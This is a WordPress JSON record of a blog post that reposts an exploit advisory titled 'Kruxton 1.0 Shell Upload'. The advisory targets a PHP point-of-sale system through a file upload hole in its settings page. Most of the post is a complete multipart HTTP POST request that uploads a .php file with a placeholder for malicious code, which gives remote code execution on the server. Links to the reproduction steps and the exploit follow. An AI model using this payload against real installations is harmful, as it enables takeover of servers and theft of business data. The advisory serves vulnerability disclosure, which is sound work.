{"id":56267,"date":"2024-04-15T21:19:47","date_gmt":"2024-04-15T17:19:47","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/178057\/kruxton10-shell.txt"},"modified":"2024-04-15T21:19:47","modified_gmt":"2024-04-15T17:19:47","slug":"kruxton-1-0-shell-upload","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/kruxton-1-0-shell-upload\/","title":{"rendered":"Kruxton 1.0 Shell Upload"},"content":{"rendered":"<p>## Title: kruxton-1.0-FileUpload-RCE<br \/>## Author: nu11secur1ty<br \/>## Date: 04\/15\/2024<br \/>## Vendor: https:\/\/www.mayurik.com\/<br \/>## Software: https:\/\/www.sourcecodester.com\/php\/16127\/best-pos-management-system-php.html<br \/>## Reference: https:\/\/portswigger.net\/web-security\/file-upload<\/p>\n<p>## Description:<br \/>The system settings function has a file upload vulnerability in the<br \/>IMG parameter.<br \/>An attacker can upload a malicious PHP file to the server and<br \/>then execute it.<br \/>This is a potential CRITICAL PROBLEM!<\/p>\n<p>STATUS: HIGH- Vulnerability<\/p>\n[+]Payload:<br \/>```POST<br \/>POST \/kruxton\/ajax.php?action=save_settings HTTP\/1.1<br \/>Host: localpwnedhost.com<br \/>Cookie: bLicense67=1; sEmail=kurec%40guhai.mi.huq;<br \/>PHPSESSID=lp21rf44drtnogjboa8v7lpmg1<br \/>Content-Length: 1043<br \/>Sec-Ch-Ua: &quot;Chromium&quot;;v=&quot;123&quot;, &quot;Not:A-Brand&quot;;v=&quot;8&quot;<br \/>Accept: *\/*<br \/>Content-Type: multipart\/form-data;<br \/>boundary=----WebKitFormBoundaryUwsdkjlNQ5exBwrq<br \/>X-Requested-With: XMLHttpRequest<br \/>Sec-Ch-Ua-Mobile: ?0<br \/>User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64)<br \/>AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/123.0.6312.88<br \/>Safari\/537.36<br \/>Sec-Ch-Ua-Platform: &quot;Windows&quot;<br \/>Origin: https:\/\/localpwnedhost.com<br \/>Sec-Fetch-Site: same-origin<br \/>Sec-Fetch-Mode: cors<br \/>Sec-Fetch-Dest: empty<br \/>Referer: 
https:\/\/localpwnedhost.com\/kruxton\/index.php?page=site_settings<br \/>Accept-Encoding: gzip, deflate, br<br \/>Accept-Language: en-US,en;q=0.9<br \/>Priority: u=1, i<br \/>Connection: close<\/p>\n<p>------WebKitFormBoundaryUwsdkjlNQ5exBwrq<br \/>Content-Disposition: form-data; name=&quot;name&quot;<\/p>\n<p>Kruxton Bristo By Mayuri K<br \/>------WebKitFormBoundaryUwsdkjlNQ5exBwrq<br \/>Content-Disposition: form-data; name=&quot;email&quot;<br \/>mayuri.infospace@gmail.com<br \/>------WebKitFormBoundaryUwsdkjlNQ5exBwrq<br \/>Content-Disposition: form-data; name=&quot;contact&quot;<\/p>\n<p>9000000000<br \/>------WebKitFormBoundaryUwsdkjlNQ5exBwrq<br \/>Content-Disposition: form-data; name=&quot;about&quot;<\/p>\n<p>&lt;p&gt;Kruxton Bristo By Mayuri K&lt;\/p&gt;&lt;p data-f-id=&quot;pbf&quot; style=&quot;text-align:<br \/>center; font-size: 14px; margin-top: 30px; opacity: 0.65; font-family:<br \/>sans-serif;&quot;&gt;Powered by &lt;a<br \/>href=&quot;https:\/\/www.froala.com\/wysiwyg-editor?pb=1&quot; title=&quot;Froala<br \/>Editor&quot;&gt;Froala Editor&lt;\/a&gt;&lt;\/p&gt;<br \/>------WebKitFormBoundaryUwsdkjlNQ5exBwrq<br \/>Content-Disposition: form-data; name=&quot;img&quot;; filename=&quot;1nsi1deyou.php&quot;<br \/>Content-Type: application\/octet-stream<\/p>\n<p>&lt;?php<br \/>\/\/ by nu11secur1ty - 2024<br \/>\/\/Your malicious code here<br \/>?&gt;<\/p>\n<p>------WebKitFormBoundaryUwsdkjlNQ5exBwrq--<br \/>```<\/p>\n<p>## Reproduce:<br \/>[href](https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/mayuri_k\/2023\/kruxton-1.0)<\/p>\n<p>## Proof and Exploit:<br \/>[href](https:\/\/www.nu11secur1ty.com\/2024\/04\/kruxton-10-fileupload-rce.html)<\/p>\n<p>## Time spent:<br \/>00:15:00<\/p>\n","protected":false},"excerpt":{"rendered":"<p>## Title: kruxton-1.0-FileUpload-RCE ## Author: nu11secur1ty ## Date: 04\/15\/2024 ## Vendor: 
https:\/\/www.mayurik.com\/ ## Software: https:\/\/www.sourcecodester.com\/php\/16127\/best-pos-management-system-php.html ## Reference: https:\/\/portswigger.net\/web-security\/file-upload ## Description: The system settings function has a file upload vulnerability in the IMG parameter. An attacker can upload a malicious PHP file to the server and then execute it. This is a potential CRITICAL PROBLEM! STATUS: HIGH- Vulnerability [+]Payload: ```POST POST \/kruxton\/ajax.php?action=save_settings HTTP\/1.1 Host: localpwnedhost.com Cookie: bLicense67=1; sEmail=kurec%40guhai.mi.huq; PHPSESSID=lp21rf44drtnogjboa8v7lpmg1 Content-Length: &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-56267","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56267","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=56267"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56267\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=56267"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=56267"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=56267"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/
{rel}","templated":true}]}}